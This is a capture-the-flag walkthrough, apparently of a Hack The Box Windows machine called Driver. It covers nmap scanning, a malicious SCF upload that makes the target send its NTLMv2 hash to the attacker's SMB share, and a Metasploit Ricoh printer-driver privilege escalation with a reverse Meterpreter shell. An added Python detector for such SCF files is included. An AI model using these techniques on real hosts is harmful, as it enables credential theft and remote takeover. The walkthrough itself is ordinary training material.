This article describes how information gathering, vulnerability analysis and exploitation of a Windows host lead first to user-level access and then to root (Administrator) access. Nmap scans the target to find its open ports and services, and uploading a malicious SCF file captures an NTLM hash. Cracking that hash gives user access, after which privilege escalation through a vulnerability in the Ricoh printer driver yields root. The article walks through the attack flow and methods step by step, offering the reader practical penetration-testing techniques and lessons learned.
Information Gathering
# Nmap 7.98 scan initiated Wed Dec 31 09:16:57 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.106
Nmap scan report for 10.10.11.106
Host is up (0.088s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows 10 1607 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows 11 (86%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows Vista or Windows 7 (86%), Microsoft Windows Server 2008 R2 or Windows 7 SP1 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.001 days (since Wed Dec 31 09:15:55 2025)
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-12-31T15:47:04
|_ start_date: 2025-12-31T15:45:49
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 6h29m44s, deviation: 0s, median: 6h29m44s
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 31 09:17:57 2025 -- 1 IP address (1 host up) scanned in 60.06 seconds
Vulnerability Analysis
Opening http://10.10.11.106/ and logging in with admin:admin gets us in, and we find a firmware upload feature. Combined with the SMB service being open, this suggests the following.
SCF NTLM hash capture
Windows has a feature: if a folder contains a .scf (Shell Command File) and Windows Explorer (or some background service) tries to view that folder, the .scf file can instruct the system to load a "remote icon".
Attack flow:
- Upload a malicious .scf file whose contents say "fetch the icon from the attacker's machine".
- When a background service on the target processes the upload directory, it tries to connect to Kali.
- When Windows connects to an SMB share, it sends the current user's NTLMv2 hash by default to authenticate.
- Listen with Responder on Kali to intercept this hash.
- Once the hash is obtained, crack it to recover the plaintext password.
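As an added defensive example (not part of the original write-up): a small Python detector that parses an uploaded file as an SCF and flags one whose IconFile points at a UNC host, which is exactly the property the capture above relies on. The sample input is the SCF shown in this write-up; the function names are my own.

```python
import re

# Constructed sample input: the SCF body shown in this write-up.
SAMPLE_SCF = r"""[Shell]
Command=2
IconFile=\\10.10.16.3\share\test.ico
[Taskbar]
Command=ToggleDesktop
"""

# A UNC path starts with two backslashes followed by the host name or IP.
UNC_HOST_RE = re.compile(r"^\\\\([^\\/]+)")

def parse_scf(text):
    """Parse INI-style SCF text into {section: {key: value}}, names lower-cased."""
    data, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            data.setdefault(section, {})
        elif "=" in line and section is not None:
            key, value = line.split("=", 1)
            data[section][key.strip().lower()] = value.strip()
    return data

def remote_icon_host(text):
    """Return the UNC host the [Shell] IconFile points at, or None if it is local.
    A benign SCF ("Show Desktop") uses a local icon such as explorer.exe,3; a UNC
    IconFile makes the viewer open an outbound SMB connection carrying its NTLMv2 response."""
    icon = parse_scf(text).get("shell", {}).get("iconfile", "")
    match = UNC_HOST_RE.match(icon)
    return match.group(1) if match else None

def scan_files(named_contents):
    """Flag (name, host) for every blob that is SCF-shaped and has a remote icon.
    The extension is ignored on purpose: a name-only check misses an SCF saved as firmware.bin."""
    hits = []
    for name, blob in named_contents:
        text = blob.decode("utf-8", errors="ignore")
        if "[shell]" in text.lower():
            host = remote_icon_host(text)
            if host:
                hits.append((name, host))
    return hits
```

Feed scan_files the (name, bytes) pairs from a walk of the upload directory; the check deliberately looks at content rather than extension because the firmware uploader here accepts any file.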
Exploitation (User Flag)
Upload a malicious .scf file whose contents say "fetch the icon from the attacker's machine".
➜ Driver nano @exploit.scf
➜ Driver cat @exploit.scf
[Shell]
Command=2
IconFile=\\10.10.16.3\share\test.ico
[Taskbar]
Command=ToggleDesktop
Start the listener, then upload the file.
➜ Driver sudo responder -I tun0
[SMB] NTLMv2-SSP Hash : tony::DRIVER:9df54339562d9c7c[...]
Cracking the hash gives tony:liltony
➜ Driver evil-winrm -i 10.10.11.106 -u tony -p 'liltony'
Privilege Escalation (Root Flag)
Next we get a Meterpreter session in msfconsole.
meterpreter > ps
2848 840 taskhostw.exe x64 1 DRIVER\tony C:\Windows\System32\taskhostw.exe
meterpreter > migrate 2848 # migrate into a process in session 1, which is the interactive session
[*] Migrating from 5036 to 2848...
[*] Migration completed successfully.
msf exploit(multi/handler) > use multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > set session 1
run
[*] 10.10.11.106 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_comhijack Yes The target appears to be vulnerable.
2 exploit/windows/local/bypassuac_dotnet_profiler Yes The target appears to be vulnerable.
3 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable.
4 exploit/windows/local/bypassuac_fodhelper Yes The target appears to be vulnerable.
......
Since the service on port 80 is a printer (firmware update) service, we can try related vulnerabilities.
Let's take a look at the PowerShell command history.
C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS C:\Users\tony> type C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Add-Printer -PrinterName "RICOH_PCL6" -DriverName 'RICOH PCL6 UniversalDriver V4.23' -PortName 'lpt1:'
ping 1.1.1.1
ping 1.1.1.1
So we use
15 exploit/windows/local/ricoh_driver_privesc Yes The target appears to be vulnerable. Ricoh driver directory has full permissions
msf exploit(windows/local/ricoh_driver_privesc) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/ricoh_driver_privesc) > set session 1
session => 1
msf exploit(windows/local/ricoh_driver_privesc) > set lhost tun0
lhost => 10.10.16.3
msf exploit(windows/local/ricoh_driver_privesc) > run